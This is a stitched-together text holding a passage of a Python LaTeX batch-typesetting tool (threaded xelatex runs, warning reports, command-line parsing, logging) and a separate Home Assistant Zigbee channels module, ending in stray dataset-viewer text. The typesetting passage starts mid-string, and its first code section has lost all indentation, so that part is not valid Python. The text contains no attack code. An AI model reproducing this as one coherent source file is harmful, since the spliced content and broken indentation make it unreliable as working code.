\\usepackage{fontspec}
\\newfontfamily\\monofont{FreeMono.otf}
\\usepackage[includeheadfoot,top=3cm,left=2cm,right=2cm,bottom=2cm]{geometry}
\\usepackage{datetime}
\\usepackage[hidelinks]{hyperref}
\\long\\def\\treateachletterasword{%
\\bgroup
\\XeTeXinterchartokenstate=1% Enable Character Classes (unique to xelatex) 0=off 1=on
\\XeTeXinterchartoks 0 0 = {\\penalty0\\relax}% Set token to be inserted between interchar class 0 and interchar class 0
\\monofont% Set monospaced font
\\setlength{\parindent}{0pt}% Remove new paragraph indentation
\\obeylines% \\catcode`\\^^M\\active \\let ^^M\\par
}%
\\def\\endtreateachletterasword{\\egroup}
\\title{Warning Report}
\\date{Typeset \\today{} at \\currenttime{}}
\\author{TeXGen System}
\\begin{document}
\\maketitle{}
\\tableofcontents
\\newpage
"""
post_doc = """
\\end{document}"""
if len(error_list) > 0:
if self.arg_pack.recursive == True:# Input must be directory
base_dir = os.path.abspath(self.arg_pack.input[0])
error_report_dir = os.path.join(base_dir,'__WarningReport__')
error_report_file = os.path.join(error_report_dir, '__WarningReport__.tex')
else:# Non-recursive, file list input, currently same as recursive
base_dir = os.path.abspath(os.path.join(self.arg_pack.input[0],os.pardir))
error_report_dir = os.path.join(base_dir,'__WarningReport__')
error_report_file = os.path.join(error_report_dir, '__WarningReport__.tex')
if os.path.isdir(error_report_dir) == True:
logger.warning('"{}" directory already exists. Directory name adjusted using current time for unique name.'.format(error_report_dir))
error_report_dir = error_report_dir + '{}'.format(time.time())
error_report_file = os.path.join(error_report_dir, '__WarningReport__{}.tex'.format(time.time()))
os.makedirs(error_report_dir)
f1 = open(error_report_file,'w')
f1.write(pre_doc)
for line in error_list:
f1.write(line)
f1.write(post_doc)
f1.close()
self.arg_pack.tex_queue.put(error_report_file)
def escapeTexString(self,string): # Returns TeX-friendly string
logger.debug('Running escapeTexString')
rep = { # define desired replacements in this dictionary (mapping)
'&': '\\&',
'%': '\\%',
'#': '\\#',
'_': '\\_',
'{': '\\{', # REGEX Special
'}': '\\}', # REGEX Special
'~': '\\char"007E{}', # LaTeX Special
'$': '\\$', # REGEX Special
'\\': '\\char"005C{}', # REGEX/LaTeX Special
'^': '\\char"005E{}', # REGEX/LaTeX Special
'"': '\\char"FF02{}',
'[': '\\char"005B{}', # Left Square Bracket
']': '\\char"005D{}', # Left Square Bracket
}
# use these two lines to do the replacement (could be shortened to one line)
pattern = re.compile("|".join(map(re.escape,rep.keys()))) # Create single pattern object (key to simultaneous replacement)
new_string = pattern.sub(lambda match: rep[match.group(0)], string)
return new_string
class TypesetThread(threading.Thread):# was called "TypesetDocuments"
    """Worker thread: pulls .tex paths from arg_pack.tex_queue and typesets them.

    Produced artifacts are reported through arg_pack.completed_queue (PDF and
    log paths as 1-tuples); sources that fail to build go to
    arg_pack.failed_queue.  A shared stop_flag aborts further typesetting.
    """
    def __init__(self, arg_pack):
        super().__init__()
        self.arg_pack = arg_pack # shared options/queues/flags for all workers
    def run(self): # called by threadingobject.start() (thread.start())
        """Consume the tex queue until it is empty or the stop flag is set."""
        # Normal operation: typeset jobs until the queue is exhausted.
        # (is_set() replaces the deprecated isSet() alias.)
        while self.arg_pack.stop_flag.is_set() == False:
            try: # queue.Empty is raised when no job is available
                item = self.arg_pack.tex_queue.get_nowait()# thread pulls item from task queue
                self.typesetFile(item)
            except queue.Empty:
                break # exit while when queue is empty
            else:
                self.arg_pack.tex_queue.task_done()
        # Shutdown requested: drain remaining jobs without typesetting so the
        # main thread's tex_queue.join() can unblock.
        while self.arg_pack.stop_flag.is_set() == True:
            try:
                item = self.arg_pack.tex_queue.get_nowait()# thread pulls item from task queue
                logger.debug('TypesetThread: Detected stopflag. Removing job "{}" from the Queue.'.format(item))
            except queue.Empty:
                break
            else:
                self.arg_pack.tex_queue.task_done()
        if self.arg_pack.stop_flag.is_set() == True:# Check stop_flag again for log message
            logger.info('TypesetThread: Detected stopflag. Rejoining thread {} to main thread.'.format(threading.get_ident()))
            logger.debug('TypesetThread: Queue empty? {}'.format(self.arg_pack.tex_queue.empty())) # join waits for queue to be empty
    def typesetFile(self,tex_file):
        """Run the configured typesetter on *tex_file* for the configured
        number of iterations, recording success/failure on the shared queues.
        """
        parent_dir = os.path.dirname(os.path.abspath(tex_file))
        tex_file_name = os.path.basename(tex_file)
        # -halt-on-error: ensure that xelatex stops on errors without presenting a console
        # -interaction=nonstopmode:
        # -file-line-error: makes it easier to identify errors in inputted files
        command = '{} {}'.format(self.arg_pack.typesetter, tex_file_name)
        timeout = 300 # seconds allowed per typesetter invocation
        logger.debug('typesetFile: iterations: {}'.format(self.arg_pack.iterations[0]))
        for round_step in range(self.arg_pack.iterations[0]):
            if self.arg_pack.stop_flag.is_set() == False:
                logger.info('Starting: \n {}\n Thread ID: {} Round: {} at: {} Timeout: {} seconds'.format(command,self.ident,round_step+1,time.time(),timeout))
                process = subprocess.Popen(command,stdout=subprocess.PIPE,shell=True,cwd=parent_dir)
                try:
                    proc_stdout = process.communicate(timeout=timeout)[0].strip()
                except subprocess.TimeoutExpired:
                    # Only a timeout is expected here; the previous bare
                    # 'except' also swallowed unrelated errors.
                    process.kill()
                    process.communicate() # reap the killed child so returncode is populated
                    logger.error('Killed process due to timeout:\n Timeout: {} seconds\n {}'.format(timeout,command))
                if process.returncode != 0:
                    logger.error('Failed: \n {}\n Thread ID: {} Round: {} at: {}'.format(command,self.ident,round_step+1,time.time()))
                    self.arg_pack.failed_queue.put((tex_file, )) # add tuple
                    self.arg_pack.exitcode = 1
                    break # escape next highest loop
                else:
                    logger.info('Completed: \n {}\n Thread ID: {} Round: {} at: {}'.format(command,self.ident,round_step+1,time.time()))
                    if (round_step + 1) == self.arg_pack.iterations[0] and process.returncode < 1: # only add after iterations finished
                        self.arg_pack.completed_queue.put((os.path.splitext(tex_file)[0]+'.pdf', ))
                if (round_step + 1) == self.arg_pack.iterations[0]:
                    self.arg_pack.completed_queue.put((os.path.splitext(tex_file)[0]+'.log', ))
class ShowHelpOnNoArgsParser(argparse.ArgumentParser):
    """Argument parser that prints the full help text whenever parsing fails."""

    def error(self, message):
        """Report *message* on stderr, show the help, and exit with status 2."""
        sys.stderr.write('error: %s\n' % (message))
        self.print_help()
        self.exitcode = 2
        sys.exit(2)
class Struct(object): # Abstract class for struct
    """Lightweight attribute bag initialised from keyword arguments."""
    def __init__(self, **argd):
        # Every keyword becomes an instance attribute.
        for key, value in argd.items():
            setattr(self, key, value)
class ArgStruct(Struct): # Here all types are given that must match argparse types
    """Default argument pack consumed by TeXGen and TypesetThread.

    All of the following are *class* attributes, so the queues and the
    stop-flag Event are created once at class definition time and shared by
    every ArgStruct instance in the process.
    """
    input = []
    recursive = False
    daemon = False
    depth = 0
    output = ""
    clean = False
    # NOTE(review): setupArgPack() assigns arg_struct.typesetter and
    # TypesetThread reads arg_pack.typesetter -- this 'typeset' default
    # appears unused; confirm before relying on it.
    typeset = ""
    log = ""
    movelogs = False
    warning_report = False
    error_report = False
    thread_limit = 0
    iterations = 0
    prehook = ""
    posthook = ""
    verbosity = "INFO"
    hook_errors = ""
    # Following do not take CLI args
    tex_queue = queue.Queue() # List of files to process
    stop_flag = threading.Event() # Object for signaling threads
    completed_queue = queue.Queue() # Optional for getting results from each thread
    failed_queue = queue.Queue() # Object for failed tex files
    exitcode = 0
def setupArgPack(parser,arg_struct): # here parser values are assigned to struct values
    """Copy parsed CLI options from *parser* onto *arg_struct* and return it.

    The command line is parsed exactly once; the previous implementation
    re-ran ``parser.parse_args()`` (a full re-parse of ``sys.argv``) for
    every single field.

    :param parser: a configured argparse.ArgumentParser (see parseArgs()).
    :param arg_struct: object whose attributes receive the option values.
    :return: *arg_struct*, for chaining.
    """
    args = vars(parser.parse_args())
    arg_struct.input = args.get('input')
    arg_struct.recursive = args.get('recursive')
    # arg_struct.daemon = args.get('daemon')  # daemon flag currently disabled
    arg_struct.depth = args.get('depth')
    arg_struct.output = args.get('output')
    arg_struct.clean = args.get('clean')
    arg_struct.typesetter = args.get('typesetter')
    arg_struct.log = args.get('log')
    arg_struct.movelogs = args.get('movelogs')
    arg_struct.warning_report = args.get('warning_report')
    arg_struct.error_report = args.get('error_report')
    arg_struct.thread_limit = args.get('thread_limit')
    arg_struct.iterations = args.get('iterations')
    arg_struct.prehook = args.get('prehook')
    arg_struct.posthook = args.get('posthook')
    arg_struct.hook_errors = args.get('hook_errors')
    arg_struct.verbosity = args.get('verbosity')
    arg_struct.exitcode = 0
    return arg_struct
def parseArgs(): # Grab args and return argparse obj
    """Build and return the CLI argument parser.

    Also parses the current command line once, purely to log the options
    that were supplied (the ShowHelpOnNoArgsParser subclass prints the full
    help and exits when parsing fails).

    :return: the configured parser object.
    """
    parser = ShowHelpOnNoArgsParser() #argparse.ArgumentParser(description='Process optional arguments.')
    parser.add_argument('input',nargs='+', help='Input is required. Input TeX file(s), or a path when using recursive -r')
    parser.add_argument('-r', '--recursive',action='store_true', help='Recursively find .tex files to compile. Depth can be set by depth -D.')
    # parser.add_argument('-d', '--daemon',action='store_true', help='Run in daemon mode.')
    parser.add_argument('-D', '--depth',action='store', nargs=1, type=int, default=[0], help='Set recursive depth. Default: 0 (infinity)')
    parser.add_argument('-o', '--output',action='store', dest='output', help='Move PDFs to specified directory. (when combined with -l, move logs also)')
    parser.add_argument('-c', '--clean', action='store_true', help='Remove everything in output directory. CAREFUL.')
    parser.add_argument('-l', '--log',action='store', nargs=1, default=[], help='Specify log output file. Directory will be created automatically. Existing logs with the same name will be overwritten. Log level is set to INFO unless explicitly set. Debug log is created automatically.')
    parser.add_argument('-L', '--movelogs',action='store_true', help='Move logs with pdfs to -o directory.')
    parser.add_argument('-w', '--warning_report',action='store', nargs=1, default=[], help='Generate warning report of all logs using a file containing a newline-delimited list of regular expressions to match. When input consists of individual files, the report will be created within the parent directory of the first file.')
    # Typo fixes below: "a sfile" -> "a file" (and "supress" -> "suppress" in -V).
    parser.add_argument('-e', '--error_report',action='store', nargs=1, default=[], help='Generate error report of all logs using a file containing a newline-delimited list of regular expressions to match. When input consists of individual files, the report will be created within the parent directory of the first file. Documents that fail to typeset correctly will also be included.')
    parser.add_argument('-t', '--thread_limit', action='store', nargs=1, type=int, default=[4], help='Limit number of simultaneous threads, otherwise use the maximum possible.')
    parser.add_argument('-T', '--typesetter',action='store', dest='typesetter', default='xelatex -interaction=nonstopmode -halt-on-error -file-line-error', help='Explicitly set typeset command to be called. e.g. "xelatex -interaction=nonstopmode -halt-on-error -file-line-error"')
    parser.add_argument('-i', '--iterations', action='store', nargs=1, type=int, default=[3], help='Specify number of times the TeX file should be typeset/compiled. Default: 3.')
    parser.add_argument('-p', '--prehook', action='store', nargs='+', dest='prehook', help='Call external script before processing documents.')
    parser.add_argument('-P', '--posthook', action='store', nargs='+', dest='posthook', help='Call external script after processing documents.')
    parser.add_argument('-H', '--hook-errors', action='store', nargs=1, default=[], help='Specify path to input file containing a list of hook errors to appear in the error report. It should be formatted in latex code.')
    parser.add_argument('-V', '--verbosity',action='store', nargs=1, default=[], help='Set console log message level (lowest to highest: DEBUG,INFO,WARN,ERROR,CRITICAL) or QUIET to suppress all messages.')
    args_given = vars(parser.parse_args())
    logger.debug('Args provided: %s' % (args_given))
    return parser # Return parser object
def setLogs(arg_pack):
    """Configure console and file logging from the parsed CLI arguments.

    Uses module-level objects: ``logger`` (root app logger), ``consoleh``
    (console handler) and ``formatter_file`` (file log formatter).

    - Validates ``arg_pack.verbosity`` against the accepted level names,
      falling back to INFO (with a warning) on an invalid value.
    - ``QUIET`` is not a real ``logging`` level: it removes the console
      handler entirely; file handlers then default to INFO.
    - If ``arg_pack.log`` is given, attaches a normal file handler at the
      selected level plus a ``<log>.debug.log`` handler at DEBUG.
    """
    valid_levels = ('DEBUG', 'INFO', 'ERROR', 'WARN', 'CRITICAL', 'QUIET')
    if len(arg_pack.verbosity) > 0:
        requested_level = arg_pack.verbosity[0]
        logger.info('setLogs: Setting log verbosity.\n  Verbosity: {}'.format(requested_level))
        if requested_level in valid_levels:
            log_level = requested_level
        else:
            # Warn once about the *requested* value (the old for/else loop
            # warned for every non-matching candidate and clobbered a valid
            # match made earlier in the list).
            logger.warning('Invalid log level set: {}\n  Level: INFO'.format(requested_level))
            log_level = 'INFO'
    else:
        # No -V/--verbosity given: use the default.
        log_level = 'INFO'
    # At this point, log_level contains one valid level name.
    if log_level == 'QUIET':
        # QUIET means "no console output"; logging has no QUIET attribute,
        # so never getattr() it (the old code crashed here).
        logger.debug('Setting console log level to QUIET.')
        logger.removeHandler(consoleh)
        file_level = logging.INFO  # file logs still use the default level
    else:
        file_level = getattr(logging, log_level)  # name -> numeric level
        logger.debug('Setting log level to {}.'.format(log_level))
        consoleh.setLevel(file_level)
    # Set file logger level.
    if arg_pack.log != []:  # determine whether a log file is desired
        log_dir = os.path.abspath(os.path.join(arg_pack.log[0], os.pardir))
        os.makedirs(log_dir, exist_ok=True)  # propagates OSError, as before
        # Add file log handler at the selected level.
        log_file = logging.FileHandler(arg_pack.log[0], mode='w', encoding=None, delay=False)
        log_file.setFormatter(formatter_file)
        log_file.setLevel(file_level)
        logger.addHandler(log_file)
        # Add a second, always-DEBUG file handler for full diagnostics.
        log_debug_file = logging.FileHandler('{}.debug.log'.format(arg_pack.log[0]), mode='w', encoding=None, delay=False)
        log_debug_file.setFormatter(formatter_file)
        log_debug_file.setLevel(logging.DEBUG)
        logger.addHandler(log_debug_file)
    logger.info('Log level set to: {}'.format(log_level))
def convertToHumanTime(total_time):
    """Convert a duration in seconds to a human-readable string.

    ``total_time`` may be an int or float number of seconds (e.g. from
    ``time.time()`` deltas); it is truncated to whole seconds so the
    output never shows float noise like ``1.0 hours``.

    Fixes the original's dropped-days bug: ``days`` was computed but never
    reported, so runs longer than 24h under-reported elapsed time. Days
    are now prepended when non-zero, keeping the original format otherwise.
    """
    total_seconds = int(total_time)
    days = total_seconds // 86400
    hours = total_seconds // 3600 % 24
    minutes = total_seconds // 60 % 60
    seconds = total_seconds % 60
    human_readable_total_time = '%s hours; %s minutes; %s seconds' % (hours, minutes, seconds)
    if days:
        human_readable_total_time = '%s days; %s' % (days, human_readable_total_time)
    return human_readable_total_time
def main():
    """Script entry point: parse args, run TeXGen, report timing, and exit.

    Exits the process with ``arg_pack.exitcode`` as set during processing.
    """
    parser = parseArgs()
    arg_pack = setupArgPack(parser, ArgStruct())
    # Configure logging as early as possible so everything below is captured.
    setLogs(arg_pack)
    started = time.time()
    texgen = TeXGen(arg_pack)  # does all the work; exitcode lands on arg_pack
    elapsed_human = convertToHumanTime(time.time() - started)
    logger.info('Process has ended. Exit code: {}. Time elapsed: {}'.format(arg_pack.exitcode, elapsed_human))
    sys.exit(arg_pack.exitcode)
# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()
|
|
"""Channels module for Zigbee Home Automation."""
from __future__ import annotations
import asyncio
from typing import Any, Dict, List, Optional, Tuple, Union
import zigpy.zcl.clusters.closures
from homeassistant.const import ATTR_DEVICE_ID
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_send
from . import ( # noqa: F401 # pylint: disable=unused-import
base,
closures,
general,
homeautomation,
hvac,
lighting,
lightlink,
manufacturerspecific,
measurement,
protocol,
security,
smartenergy,
)
from .. import (
const,
device as zha_core_device,
discovery as zha_disc,
registries as zha_regs,
typing as zha_typing,
)
ChannelsDict = Dict[str, zha_typing.ChannelType]
class Channels:
    """All discovered channels of a device.

    Holds one :class:`ChannelPool` per non-ZDO endpoint of the underlying
    zigpy device, plus the device-wide ZDO channel, and relays entity
    registration and zha events to Home Assistant.
    """
    def __init__(self, zha_device: zha_typing.ZhaDeviceType) -> None:
        """Initialize instance."""
        self._pools: List[zha_typing.ChannelPoolType] = []
        # Device-wide singleton channels; the property setters below keep
        # only the first channel assigned.
        self._power_config = None
        self._identify = None
        # Caps how many channel initialize/configure coroutines run
        # concurrently for this device (used by the pools via `semaphore`).
        self._semaphore = asyncio.Semaphore(3)
        self._unique_id = str(zha_device.ieee)
        # Endpoint 0 of a zigpy device is the ZDO endpoint.
        self._zdo_channel = base.ZDOChannel(zha_device.device.endpoints[0], zha_device)
        self._zha_device = zha_device
    @property
    def pools(self) -> List[ChannelPool]:
        """Return channel pools list (one per non-ZDO endpoint)."""
        return self._pools
    @property
    def power_configuration_ch(self) -> zha_typing.ChannelType:
        """Return power configuration channel."""
        return self._power_config
    @power_configuration_ch.setter
    def power_configuration_ch(self, channel: zha_typing.ChannelType) -> None:
        """Power configuration channel setter (first assignment wins)."""
        if self._power_config is None:
            self._power_config = channel
    @property
    def identify_ch(self) -> zha_typing.ChannelType:
        """Return identify channel."""
        return self._identify
    @identify_ch.setter
    def identify_ch(self, channel: zha_typing.ChannelType) -> None:
        """Identify channel setter (first assignment wins)."""
        if self._identify is None:
            self._identify = channel
    @property
    def semaphore(self) -> asyncio.Semaphore:
        """Return semaphore for concurrent tasks."""
        return self._semaphore
    @property
    def zdo_channel(self) -> zha_typing.ZDOChannelType:
        """Return ZDO channel."""
        return self._zdo_channel
    @property
    def zha_device(self) -> zha_typing.ZhaDeviceType:
        """Return parent zha device."""
        return self._zha_device
    @property
    def unique_id(self):
        """Return the unique id for this channel (the device IEEE as str)."""
        return self._unique_id
    @property
    def zigbee_signature(self) -> Dict[int, Dict[str, Any]]:
        """Get the zigbee signatures for the pools in channels.

        Maps endpoint id -> endpoint signature dict (see
        ``ChannelPool.zigbee_signature`` for the per-endpoint shape).
        """
        return {
            signature[0]: signature[1]
            for signature in [pool.zigbee_signature for pool in self.pools]
        }
    @classmethod
    def new(cls, zha_device: zha_typing.ZhaDeviceType) -> Channels:
        """Create new instance with a pool for every device endpoint."""
        channels = cls(zha_device)
        for ep_id in sorted(zha_device.device.endpoints):
            channels.add_pool(ep_id)
        return channels
    def add_pool(self, ep_id: int) -> None:
        """Add channels for a specific endpoint."""
        # Endpoint 0 (ZDO) is handled by self._zdo_channel, not a pool.
        if ep_id == 0:
            return
        self._pools.append(ChannelPool.new(self, ep_id))
    async def async_initialize(self, from_cache: bool = False) -> None:
        """Initialize claimed channels (ZDO first, then all pools in parallel)."""
        await self.zdo_channel.async_initialize(from_cache)
        self.zdo_channel.debug("'async_initialize' stage succeeded")
        await asyncio.gather(
            *(pool.async_initialize(from_cache) for pool in self.pools)
        )
    async def async_configure(self) -> None:
        """Configure claimed channels (ZDO first, then all pools in parallel)."""
        await self.zdo_channel.async_configure()
        self.zdo_channel.debug("'async_configure' stage succeeded")
        await asyncio.gather(*(pool.async_configure() for pool in self.pools))
    @callback
    def async_new_entity(
        self,
        component: str,
        entity_class: zha_typing.CALLABLE_T,
        unique_id: str,
        channels: List[zha_typing.ChannelType],
    ):
        """Signal new entity addition."""
        # Once the device is fully initialized, discovery has already run;
        # drop late registrations instead of queuing duplicates.
        if self.zha_device.status == zha_core_device.DeviceStatus.INITIALIZED:
            return
        self.zha_device.hass.data[const.DATA_ZHA][component].append(
            (entity_class, (unique_id, self.zha_device, channels))
        )
    @callback
    def async_send_signal(self, signal: str, *args: Any) -> None:
        """Send a signal through hass dispatcher."""
        async_dispatcher_send(self.zha_device.hass, signal, *args)
    @callback
    def zha_send_event(self, event_data: Dict[str, Union[str, int]]) -> None:
        """Relay events to hass, tagging them with device identifiers."""
        self.zha_device.hass.bus.async_fire(
            "zha_event",
            {
                const.ATTR_DEVICE_IEEE: str(self.zha_device.ieee),
                const.ATTR_UNIQUE_ID: self.unique_id,
                ATTR_DEVICE_ID: self.zha_device.device_id,
                **event_data,
            },
        )
class ChannelPool:
    """All channels of an endpoint.

    Wraps a single zigpy endpoint: creates server channels for its input
    clusters, client channels for registered output clusters, and tracks
    which channels have been claimed by entities.
    """
    def __init__(self, channels: Channels, ep_id: int):
        """Initialize instance."""
        self._all_channels: ChannelsDict = {}
        self._channels: Channels = channels
        self._claimed_channels: ChannelsDict = {}
        self._id: int = ep_id
        self._client_channels: Dict[str, zha_typing.ClientChannelType] = {}
        # "<device ieee>-<endpoint id>"
        self._unique_id: str = f"{channels.unique_id}-{ep_id}"
    @property
    def all_channels(self) -> ChannelsDict:
        """All server channels of an endpoint."""
        return self._all_channels
    @property
    def claimed_channels(self) -> ChannelsDict:
        """Channels in use."""
        return self._claimed_channels
    @property
    def client_channels(self) -> Dict[str, zha_typing.ClientChannelType]:
        """Return a dict of client channels."""
        return self._client_channels
    @property
    def endpoint(self) -> zha_typing.ZigpyEndpointType:
        """Return endpoint of zigpy device."""
        return self._channels.zha_device.device.endpoints[self.id]
    @property
    def id(self) -> int:
        """Return endpoint id."""
        return self._id
    @property
    def nwk(self) -> int:
        """Device NWK for logging."""
        return self._channels.zha_device.nwk
    @property
    def is_mains_powered(self) -> bool:
        """Device is_mains_powered."""
        return self._channels.zha_device.is_mains_powered
    @property
    def manufacturer(self) -> Optional[str]:
        """Return device manufacturer."""
        return self._channels.zha_device.manufacturer
    @property
    def manufacturer_code(self) -> Optional[int]:
        """Return device manufacturer code."""
        return self._channels.zha_device.manufacturer_code
    @property
    def hass(self):
        """Return hass."""
        return self._channels.zha_device.hass
    @property
    def model(self) -> Optional[str]:
        """Return device model."""
        return self._channels.zha_device.model
    @property
    def skip_configuration(self) -> bool:
        """Return True if device does not require channel configuration."""
        return self._channels.zha_device.skip_configuration
    @property
    def unique_id(self):
        """Return the unique id for this channel pool."""
        return self._unique_id
    @property
    def zigbee_signature(self) -> Tuple[int, Dict[str, Any]]:
        """Get the zigbee signature for the endpoint this pool represents.

        Returns ``(endpoint_id, {profile, device type, in/out clusters})``
        with cluster and device-type ids rendered as 0x-prefixed hex.
        """
        return (
            self.endpoint.endpoint_id,
            {
                const.ATTR_PROFILE_ID: self.endpoint.profile_id,
                const.ATTR_DEVICE_TYPE: f"0x{self.endpoint.device_type:04x}"
                if self.endpoint.device_type is not None
                else "",
                const.ATTR_IN_CLUSTERS: [
                    f"0x{cluster_id:04x}"
                    for cluster_id in sorted(self.endpoint.in_clusters)
                ],
                const.ATTR_OUT_CLUSTERS: [
                    f"0x{cluster_id:04x}"
                    for cluster_id in sorted(self.endpoint.out_clusters)
                ],
            },
        )
    @classmethod
    def new(cls, channels: Channels, ep_id: int) -> ChannelPool:
        """Create new channels for an endpoint."""
        pool = cls(channels, ep_id)
        pool.add_all_channels()
        pool.add_client_channels()
        # Let the discovery probe create entities for this endpoint's channels.
        zha_disc.PROBE.discover_entities(pool)
        return pool
    @callback
    def add_all_channels(self) -> None:
        """Create and add channels for all input clusters."""
        for cluster_id, cluster in self.endpoint.in_clusters.items():
            # Unregistered clusters fall back to the generic ZigbeeChannel.
            channel_class = zha_regs.ZIGBEE_CHANNEL_REGISTRY.get(
                cluster_id, base.ZigbeeChannel
            )
            # really ugly hack to deal with xiaomi using the door lock cluster
            # incorrectly: it actually carries multistate input data.
            if (
                hasattr(cluster, "ep_attribute")
                and cluster_id == zigpy.zcl.clusters.closures.DoorLock.cluster_id
                and cluster.ep_attribute == "multistate_input"
            ):
                channel_class = general.MultistateInput
            # end of ugly hack
            channel = channel_class(cluster, self)
            if channel.name == const.CHANNEL_POWER_CONFIGURATION:
                if (
                    self._channels.power_configuration_ch
                    or self._channels.zha_device.is_mains_powered
                ):
                    # only one power configuration channel per device; also
                    # skipped entirely for mains-powered devices
                    continue
                self._channels.power_configuration_ch = channel
            elif channel.name == const.CHANNEL_IDENTIFY:
                self._channels.identify_ch = channel
            self.all_channels[channel.id] = channel
    @callback
    def add_client_channels(self) -> None:
        """Create client channels for all output clusters if in the registry."""
        for cluster_id, channel_class in zha_regs.CLIENT_CHANNELS_REGISTRY.items():
            cluster = self.endpoint.out_clusters.get(cluster_id)
            if cluster is not None:
                channel = channel_class(cluster, self)
                self.client_channels[channel.id] = channel
    async def async_initialize(self, from_cache: bool = False) -> None:
        """Initialize claimed channels."""
        await self._execute_channel_tasks("async_initialize", from_cache)
    async def async_configure(self) -> None:
        """Configure claimed channels."""
        await self._execute_channel_tasks("async_configure")
    async def _execute_channel_tasks(self, func_name: str, *args: Any) -> None:
        """Run ``func_name(*args)`` on every claimed and client channel.

        Tasks are throttled by the device-wide semaphore; failures are
        logged per channel and swallowed so one bad channel cannot abort
        the others.
        """
        async def _throttle(coro):
            # Bound concurrency using the shared device semaphore.
            async with self._channels.semaphore:
                return await coro
        channels = [*self.claimed_channels.values(), *self.client_channels.values()]
        tasks = [_throttle(getattr(ch, func_name)(*args)) for ch in channels]
        # return_exceptions=True keeps gather from cancelling siblings.
        results = await asyncio.gather(*tasks, return_exceptions=True)
        for channel, outcome in zip(channels, results):
            if isinstance(outcome, Exception):
                channel.warning("'%s' stage failed: %s", func_name, str(outcome))
                continue
            channel.debug("'%s' stage succeeded", func_name)
    @callback
    def async_new_entity(
        self,
        component: str,
        entity_class: zha_typing.CALLABLE_T,
        unique_id: str,
        channels: List[zha_typing.ChannelType],
    ):
        """Signal new entity addition (delegates to the parent Channels)."""
        self._channels.async_new_entity(component, entity_class, unique_id, channels)
    @callback
    def async_send_signal(self, signal: str, *args: Any) -> None:
        """Send a signal through hass dispatcher."""
        self._channels.async_send_signal(signal, *args)
    @callback
    def claim_channels(self, channels: List[zha_typing.ChannelType]) -> None:
        """Claim channels, marking them as in use by entities."""
        self.claimed_channels.update({ch.id: ch for ch in channels})
    @callback
    def unclaimed_channels(self) -> List[zha_typing.ChannelType]:
        """Return a list of available (unclaimed) channels."""
        claimed = set(self.claimed_channels)
        available = set(self.all_channels)
        return [self.all_channels[chan_id] for chan_id in (available - claimed)]
    @callback
    def zha_send_event(self, event_data: Dict[str, Union[str, int]]) -> None:
        """Relay events to hass, tagging them with this pool's identifiers."""
        self._channels.zha_send_event(
            {
                const.ATTR_UNIQUE_ID: self.unique_id,
                const.ATTR_ENDPOINT_ID: self.id,
                **event_data,
            }
        )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.